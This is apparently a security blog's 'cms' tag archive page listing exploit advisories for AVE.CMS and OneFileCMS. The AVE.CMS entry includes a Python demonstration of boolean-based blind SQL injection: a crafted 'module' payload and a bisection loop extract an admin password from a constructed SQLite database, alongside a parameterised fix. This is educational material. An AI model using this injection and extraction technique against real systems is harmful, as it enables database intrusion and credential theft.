
Tag Archives: cms

AVE.CMS <= 2.09 – Remote Blind SQL Injection Exploit


AVE.CMS 2.09 and earlier is vulnerable to remote blind SQL injection through the "module" parameter: the application fails to sufficiently sanitize this user-supplied value before using it in an SQL query, so injected SQL is executed by the database, although its results are never echoed back directly and must be inferred from differences in the application's responses.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
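The following Python is an added example (it is neither the advisory's exploit nor AVE.CMS's own code) showing why "blind" injection through a single parameter is still a full data-extraction primitive. A constructed in-memory SQLite database stands in for the CMS backend, `lookup_module_vulnerable()` stands in for a page that concatenates the `module` parameter into its query, and `lookup_module_safe()` shows the parameterised fix. The table and column names (`cms_modules`, `cms_users`, `username`, `password`) and the stored values are assumptions made for the demonstration.

```python
"""Boolean-based blind SQL injection, demonstrated offline against SQLite.

Added example; not code from the advisory above and not AVE.CMS's own code.
The schema, table/column names and the credential row are constructed for
the demonstration and are not taken from any real deployment.
"""
import sqlite3


def build_db():
    """Constructed sample database; the credential row is fake."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE cms_modules (name TEXT, enabled INTEGER);
        INSERT INTO cms_modules VALUES ('news', 1), ('gallery', 1);
        CREATE TABLE cms_users (username TEXT, password TEXT);
        INSERT INTO cms_users VALUES ('admin', 's3cr3t-hash');
        """
    )
    return conn


def lookup_module_vulnerable(conn, module):
    """Vulnerable pattern: the request parameter is concatenated into the
    SQL text. The caller only learns whether a row matched, which is the
    one bit of feedback that makes the injection 'blind'."""
    sql = "SELECT enabled FROM cms_modules WHERE name = '" + module + "'"
    return conn.execute(sql).fetchone() is not None


def lookup_module_safe(conn, module):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT enabled FROM cms_modules WHERE name = ?"
    return conn.execute(sql, (module,)).fetchone() is not None


def oracle(conn, condition, lookup=lookup_module_vulnerable):
    """Ask the application a yes/no question by smuggling it into the
    module parameter: the row is returned only if `condition` is true."""
    payload = "news' AND (" + condition + ") AND '1'='1"
    return lookup(conn, payload)


# Sub-select whose value the attacker wants to read (SQLite syntax).
ADMIN_PASSWORD = "(SELECT password FROM cms_users WHERE username = 'admin')"


def extract(conn, expr, max_len=64, lookup=lookup_module_vulnerable):
    """Recover the string value of `expr` one character at a time.

    The length is found first, then each character's code point is
    bisected with 'unicode(substr(expr, pos, 1)) > mid' questions, so a
    7-bit character costs 7 oracle queries rather than up to 127.
    Returns '' when the oracle never answers yes (e.g. against the safe
    lookup), so the caller can tell that the injection did not work.
    """
    length = 0
    for n in range(1, max_len + 1):
        if oracle(conn, f"length({expr}) = {n}", lookup):
            length = n
            break
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # invariant: the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}", lookup):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable lookup leaks:", extract(db, ADMIN_PASSWORD))
    print("parameterised lookup leaks:",
          repr(extract(db, ADMIN_PASSWORD, lookup=lookup_module_safe)))
```

Run it and the vulnerable lookup gives up the whole constructed credential with roughly eighty true/false queries, while the same payloads against the parameterised lookup recover nothing, because the bound value can never close the quote and become SQL. Against a real target the oracle would be an HTTP request and the "row matched" signal a difference in page content, status code or response time, but the inference loop is identical.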


Posted on May 26, 2013 in Exploits


OneFileCMS v.1.1.5 Local File Inclusion Vulnerability


# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: —
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: https://ghostinthelab.wordpress.com/
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.

Posted on March 16, 2012 in Exploits


The painful story of an... e-shop.

Admittedly, it was quite hard to get another technical article ready, and in the middle of summer at that. So I thought I would lighten the mood a little and tell you a true story: the story of two friends, an e-shop and ...a very serious security hole.


Posted on December 5, 2011 in It's Greek to Me


OneFileCMS v.1.1.1 – From XSS to Shell


# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities
# Google Dork: —
# Date: 21/8/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: https://ghostinthelab.wordpress.com/ , http://s3cure.gr
# Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip
# Version: OneFileCMS v.1.1.1
# Tested on: Linux Fedora 14

 

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.


Posted on August 21, 2011 in Exploits
